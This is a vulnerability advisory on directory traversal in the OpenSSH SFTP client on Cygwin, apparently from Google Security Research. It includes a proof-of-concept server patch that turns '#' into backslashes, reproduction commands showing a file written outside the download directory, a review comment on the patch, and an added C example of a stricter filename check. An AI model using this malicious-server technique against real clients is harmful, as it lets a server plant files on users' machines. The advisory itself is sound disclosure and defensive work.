OpenSSH On Cygwin SFTP Client Directory Traversal
Source: Google Security Research  Author: jannh  Published: 2017-03-23
OpenSSH on Cygwin: directory traversal in SFTP client 

Portable OpenSSH supports running on Cygwin. However, the SFTP client only filters out forward slashes (in do_lsreaddir()) and the directory names "." and ".." (in download_dir_internal()). On Windows, including in Cygwin, backslashes can also be used for directory traversal.

To reproduce:

On the server:

Patch OpenSSH like this, then build it:

--- openssh-7.4p1/sftp-server.c 2016-12-18 20:59:41.000000000 -0800
+++ openssh-7.4p1-patched/sftp-server.c 2016-12-20 15:55:34.980000300 -0800
@@ -1065,10 +1065,11 @@
                            strcmp(path, "/") ? "/" : "", dp->d_name);
                        if (lstat(pathname, &st) < 0)
                                continue;
                        stat_to_attrib(&st, &(stats[count].attrib));
                        stats[count].name = xstrdup(dp->d_name);
+for (i=0; i<strlen(stats[count].name); i++) if (stats[count].name[i] == '#') stats[count].name[i] = '\\';
                        stats[count].long_name = ls_file(dp->d_name, &st, 0, 0);
                        count++;
                        /* send up to 100 entries in one message */
                        /* XXX check packet size instead */
                        if (count == 100)
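
Review bot: the inserted loop after `stats[count].name = xstrdup(dp->d_name);` relies on an index `i` that is not declared in the visible context, calls strlen() in the loop condition on every pass, and sits at column 0 with no comment. Because it rewrites every '#' in the name sent to the client into a backslash while `long_name` on the following line is still built from `dp->d_name`, it should carry a comment marking it as a test-only modification for this reproduction and be indented with the surrounding block, so it cannot be mistaken for part of the server's normal readdir handling.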

Ensure that an OpenSSH server is running.

Create the following directory structure:

user@DESKTOP ~
$ mkdir -p sourceparent/source
user@DESKTOP ~
$ touch 'sourceparent/source/..#foobar'
user@DESKTOP ~
$ echo foobar > sourceparent/foobar
user@DESKTOP ~
$

Now, on the client (Cygwin on Windows 10), build OpenSSH, then recursively download a directory like this:

user@DESKTOP ~
$ mkdir destparent
user@DESKTOP ~
$ cd destparent/
user@DESKTOP ~/destparent
$ ls -la
total 4
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 .
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 ..
user@DESKTOP ~/destparent
$ ~/openssh-7.4p1/sftp -r -s /home/user/openssh-7.4p1-patched/sftp-server localhost:sourceparent/source dest
Connected to localhost.
Fetching /home/user/sourceparent/source/ to dest
Retrieving /home/user/sourceparent/source
user@DESKTOP ~/destparent
$ ls -la
total 5
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 .
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 ..
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 dest
-rwxr-xr-x  1 user None 7 Dec 20 16:24 foobar
user@DESKTOP ~/destparent
$

As you can see, sftp created the file "foobar" outside the specified destination directory "dest".
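
The following is an added example, not OpenSSH code and not the project's fix: a C comparison of a check that mirrors the filtering described in this report (only '/', "." and ".." rejected) with a stricter check that treats a server-supplied name as exactly one path component on a platform where backslash is also a separator. The function names and the sample names are hypothetical, and rejecting ':' is an extra conservative assumption beyond what the report covers.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper mirroring the filtering the report describes:
 * reject names containing '/' and the names "." and "..". */
static bool name_ok_slash_only(const char *name)
{
    if (strchr(name, '/') != NULL)
        return false;
    return strcmp(name, ".") != 0 && strcmp(name, "..") != 0;
}

/* Hypothetical stricter check: accept the server-supplied name only if it
 * is a single path component where '\\' is a separator as well. */
static bool name_ok_component(const char *name)
{
    if (name[0] == '\0')
        return false;
    /* '/' and '\\' separate components; ':' is rejected as an added
     * conservative assumption (drive prefixes), not taken from the report */
    if (strpbrk(name, "/\\:") != NULL)
        return false;
    return strcmp(name, ".") != 0 && strcmp(name, "..") != 0;
}

int main(void)
{
    /* Constructed sample names; "..\\foobar" is what the client in the
     * reproduction receives for the entry created as "..#foobar". */
    const char *samples[] = { "notes.txt", "..", "a/b", "..\\foobar",
                              "C:foo", "" };
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("%-12s slash-only=%d component=%d\n", samples[i],
               name_ok_slash_only(samples[i]),
               name_ok_component(samples[i]));
    return 0;
}
```

The slash-only check accepts "..\foobar", which is why the file in the reproduction lands next to "dest" rather than inside it; the component check rejects it.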

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.



Found by: jannh


 